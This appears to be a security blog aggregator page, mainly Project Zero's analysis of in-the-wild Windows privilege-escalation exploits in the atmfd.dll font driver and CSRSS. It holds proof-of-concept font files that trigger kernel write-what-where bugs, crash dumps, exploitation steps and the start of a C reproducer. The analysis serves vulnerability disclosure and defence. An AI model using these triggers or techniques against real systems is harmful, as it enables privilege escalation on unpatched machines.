After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.
I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.
Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.
The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.
Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.
Published: 2021-03-31 20:57:11
Popularity: 78
Author: Ryan Naraine
Keywords:
A North Korean government-backed APT group has been caught using a fake pen-testing company and a range of sock puppet social media accounts in an escalation of a hacking campaign targeting security research professionals.
Published: 2021-01-28 20:31:16
Popularity: 70
Author: Ryan Naraine
Keywords:
Apple has quietly added several anti-exploit mitigations into its flagship mobile operating system in what appears to be a specific response to zero-click iMessage attacks observed in the wild.
Published: 2021-01-12 17:37:00
Popularity: 48
Author: Ryan
This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero
In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.
The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).
On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).
Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.
The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:
int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[2];
  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {
    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];
  }

  for (int i = 0; i < 2; i++) {
    int values_read = GetOpenFixedArray(values, g_font->numMasters);
    if (values_read != g_font->numMasters) {
      return -8;
    }
    for (int num = 0; num < g_font->numMasters; num++) {
      ptrs[num][i] = values[num];
    }
  }
  return 0;
}
In summary, the function initializes numMasters pointers on the stack, then reads a same-sized array of fixed-point values from the input stream and writes each of them through the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0 and 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2], values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:
...
RSP + 0x30   ptrs[0]
RSP + 0x38   ptrs[1]
RSP + 0x40   saved RDI
RSP + 0x48   return address
RSP + 0x50   values[0 .. 1]
RSP + 0x58   saved RBX
RSP + 0x60   saved RSI
...
In this layout, the ptrs and values rows are the user-controlled local arrays, while the saved registers and the return address are internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.
After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.
A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:
~%!PS-AdobeFont-1.0: Test 001.001
dict begin
  /FontInfo begin
    /FullName (Test) def
  end
  /FontType 1 def
  /FontMatrix [0.001 0 0 0.001 0 0] def
  /WeightVector [0 0 0 0 0] def
  /Private begin
    /Blend begin
      /VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]
      /end
    end
  currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile cleartomark
The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141
rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000
 r8=0000000000000000  r9=000000000000000e r10=0000000000000000
r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po cy
ATMFD+0x22144:
fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????
Resetting default scope
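As a sanity check on those magic numbers, the mapping between the textual values in the font and the raw dwords is just a 16.16 fixed-point conversion. A small C sketch (assuming round-to-nearest; the parser's exact rounding may differ slightly):

#include <inttypes.h>
#include <math.h>
#include <stdio.h>

// Convert a decimal value from the font program into the raw 16.16
// fixed-point dword the parser stores.
static uint32_t to_fixed16_16(double v) {
  return (uint32_t)(int32_t)llround(v * 65536.0);
}

int main(void) {
  printf("%08" PRIx32 "\n", to_fixed16_16(16705.25490)); // 41414141: low half of the target address
  printf("%08" PRIx32 "\n", to_fixed16_16(-0.00001));    // ffffffff: high half of the target address
  printf("%08" PRIx32 "\n", to_fixed16_16(16962.25882)); // 42424242: the value written
  return 0;
}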
The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:
int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {
    procs->BlendDesignPositions(i, &values[i]);
  }
  return 0;
}
The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.
To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:
~%!PS-AdobeFont-1.0: Test 001.001
dict begin
  /FontInfo begin
    /FullName (Test) def
  end
  /FontType 1 def
  /FontMatrix [0.001 0 0 0.001 0 0] def
  /BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]
  /Private begin
    /Blend begin
      /end
    end
  currentdict end
%currentfile eexec /Private begin
/CharStrings 1 begin
/.notdef ## -| { endchar } |-
end
end
mark %currentfile closefile cleartomark
In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffffffff41414141, memory referenced.
Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.
Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 0000000000000002, (reserved)
[...]
TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000
rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000
rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002
 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000
r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
ffffffff`41414141 ??              ???
Resetting default scope
According to our analysis, the font exploit supported Windows versions up to and including Windows 8.1; as noted earlier, Windows 10 was handled by a separate sandbox escape (CVE-2020-1027).
When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.
Things get more complicated on Windows 8.1, where the session space is no longer executable:
0: kd> !pte fffff90000000000
PXE at FFFFF6FB7DBEDF90  contains 0000000115879863  pfn 115879 ---DA--KWEV
PPE at FFFFF6FB7DBF2000  contains 0000000115878863  pfn 115878 ---DA--KWEV
PDE at FFFFF6FB7E400000  contains 0000000115877863  pfn 115877 ---DA--KWEV
PTE at FFFFF6FC80000000  contains 8000000115976863  pfn 115976 ---DA--KW-V
As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.
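The constant 0xfffff6fbc0000004 falls straight out of the fixed page-table self-map on pre-randomization x64 Windows. A small C sketch of the arithmetic (assuming the PTE base of 0xFFFFF68000000000 used on Windows 8.1):

#include <inttypes.h>
#include <stdio.h>

int main(void) {
  const uint64_t PTE_BASE = 0xFFFFF68000000000ULL;  // fixed on Windows 8.1 x64
  const uint64_t va = 0xFFFFF78000000000ULL;        // shared user data page
  // Each PTE maps a 4KB page, so the self-map compresses the VA by 9 bits
  // and keeps the low 39 bits, aligned to an 8-byte entry.
  uint64_t pte = PTE_BASE + ((va >> 9) & 0x7FFFFFFFF8ULL);
  // The NX bit is bit 63 of the 8-byte PTE, i.e. in the high dword at +4;
  // a single 32-bit write of zero there makes the page executable.
  printf("PTE: %016" PRIx64 ", high dword: %016" PRIx64 "\n", pte, pte + 4);
  return 0;
}

Running this prints fffff6fbc0000000 and fffff6fbc0000004, matching the address the exploit wrote to.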
Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.
We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.
Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:
int ParseBlendVToHOrigin(void *arg) {
  Fixed16_16 *ptrs[16];
  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {
    return -4;
  }
  [...]
}
In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:
int SetBlendDesignPositions(void *arg) {
  int num_master;
  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {
    if (GetToken() != TOKEN_OPEN) {
      break;
    }
    if (num_master >= 16) {
      return -4;
    }
    int values_read = GetOpenFixedArray(&values[num_master], 15);
    SetNumAxes(values_read);
  }
  [...]
}
The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.
csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.
The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:
NTSTATUS CsrClientCallServer(
    PCSR_API_MSG ApiMessage,
    PVOID CaptureBuffer,
    ULONG ApiNumber,
    LONG DataLength);
The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.
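Conceptually, the pointer translation is simple rebasing: the capture buffer lives in a shared section mapped at different addresses in the client and in CSRSS, so a pointer is adjusted by the delta between the two views. An illustrative sketch (the bases here are stand-ins, not the real CSR structures):

#include <stdio.h>

// Rebase a pointer from one mapping of a shared section to another by
// preserving its offset within the section.
static void *rebase(void *ptr, void *client_base, void *server_base) {
  return (char *)server_base + ((char *)ptr - (char *)client_base);
}

int main(void) {
  char client_view[256];                 // stand-in for the client mapping
  char server_view[256];                 // stand-in for the server mapping
  void *client_ptr = client_view + 0x40; // e.g. a string buffer in the message
  void *server_ptr = rebase(client_ptr, client_view, server_view);
  printf("offset preserved: %td\n", (char *)server_ptr - server_view);
  return 0;
}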
The reader can refer to this series of posts for a detailed description of the CSRSS internals.
One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"
                    version="1.0.0.0" processorArchitecture="x86"/>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"
                        version="2.5.0.0" processorArchitecture="x86"/>
    </dependentAssembly>
  </dependency>
</assembly>
The vulnerability in question was discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context; the current activation context determines the objects and libraries that need to be redirected to a specific implementation.
The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:
typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
BaseSrvSxsCreateActivationContext starts with validating the string parameters:
for (i = 0; i < 6; ++i) {
  if (StringField = StringFields[i]) {
    Length = StringField->Length;
    if (Length && !StringField->Buffer ||
        Length > StringField->MaximumLength || Length & 1)
      return 0xC000000D;
    if (StringField->Buffer) {
      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,
                                    Length + 2, 1)) {
        DbgPrintEx(0x33, 0,
                   "SXS: Validation of message buffer 0x%lx failed.\n"
                   " Message:%p\n"
                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",
                   i, ApiMessage, StringField, StringField->Length,
                   StringField->MaximumLength, StringField->Buffer);
        return 0xC000000D;
      }
      CharCount = StringField->Length >> 1;
      if (StringField->Buffer[CharCount] &&
          StringField->Buffer[CharCount - 1])
        return 0xC000000D;
    }
  }
}
CsrValidateMessageBuffer is declared as follows:
BOOLEAN CsrValidateMessageBuffer(
    PCSR_API_MSG ApiMessage,
    PVOID* Buffer,
    ULONG ElementCount,
    ULONG ElementSize);
This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
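Expressed in code, the three checks amount to something like the following sketch (illustrative types and field names, not the real CSRSS layout):

#include <stdint.h>
#include <stddef.h>

// Illustrative stand-in for the server's view of a capture buffer.
typedef struct {
  char *Data;   // start of the shared region
  size_t Size;  // total size of the region
} CAPTURE_REGION;

// The three checks CsrValidateMessageBuffer is described as performing.
static int ValidateBuffer(const CAPTURE_REGION *cap, const char *ptr,
                          size_t count, size_t elem_size) {
  // 1) the pointer must reference data inside the capture buffer
  if (ptr < cap->Data || ptr >= cap->Data + cap->Size) return 0;
  // 2) count * elem_size must not cause an integer overflow
  if (elem_size != 0 && count > SIZE_MAX / elem_size) return 0;
  // 3) the range must not run past the end of the capture buffer
  if (count * elem_size > (size_t)(cap->Data + cap->Size - ptr)) return 0;
  return 1;
}

int main(void) {
  char region[64];
  CAPTURE_REGION cap = { region, sizeof(region) };
  return ValidateBuffer(&cap, region + 8, 4, 2) ? 0 : 1;
}

Note the checks are only as good as the length they're given; the vulnerable caller passes Length + 2 here, while later consumers trust MaximumLength.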
As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:
sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity
sxs!CNodeFactory::CreateNode
sxs!XMLParser::Run
sxs!SxspIncorporateAssembly
sxs!SxspCloseManifestGraph
sxs!SxsGenerateActivationContext
sxssrv!BaseSrvSxsCreateActivationContextFromStructEx
sxssrv!BaseSrvSxsCreateActivationContext
When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:
BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;
if (BufferCapacity) {
  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;
  GenActCtxParams.ApplicationNameBuffer =
      CreateCtxParams->ApplicationName.Buffer;
} else {
  GenActCtxParams.ApplicationNameCapacity = 60;
  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);
  if (!StringBuffer) {
    Status = 0xC0000017;
    goto error;
  }
  GenActCtxParams.ApplicationNameBuffer = StringBuffer;
}
Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:
Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);
if (Context) {
  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);
} else {
  FusionpTraceAllocFailure(v14);
  SetLastError(0xE);
  goto error;
}
if (GenActCtxParams->ApplicationNameBuffer &&
    GenActCtxParams->ApplicationNameCapacity) {
  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;
  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;
}
Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:
IdentityNameBuffer = 0;
IdentityNameLength = 0;
SetLastError(0);
if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,
                                           &IdentityNameBuffer,
                                           &IdentityNameLength)) {
  CallSiteInfo = off_16506FA20;
  goto error;
}
if (IdentityNameLength &&
    IdentityNameLength < Context->ApplicationNameCapacity) {
  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,
         2 * IdentityNameLength + 2);
  Context->ApplicationNameLength = IdentityNameLength;
} else {
  *Context->ApplicationNameBuffer = 0;
  Context->ApplicationNameLength = 0;
}
The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.
Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.
As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.
The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:
The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:
1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.
2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e., a string in the form &#x1234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.
3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:
typedef struct _LDR_MODULE {
  LIST_ENTRY InLoadOrderModuleList;
  LIST_ENTRY InMemoryOrderModuleList;
  LIST_ENTRY InInitializationOrderModuleList;
  PVOID BaseAddress;
  PVOID EntryPoint;
  ULONG SizeOfImage;
  UNICODE_STRING FullDllName;
  UNICODE_STRING BaseDllName;
  ULONG Flags;
  SHORT LoadCount;
  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;
When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.
4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.
5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.
6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.
7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.
8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.
We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.
The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:
ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}
[...]
if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;
return result;
The following reproducer has been tested on Windows 10.0.18363.959.
#include <stdint.h>
#include <stdio.h>
#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "
    "processorArchitecture='amd64'/>"
    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =
    L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"
    L"d761caeca23d64a2.manifest";
const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                     ULONG BufferSize);
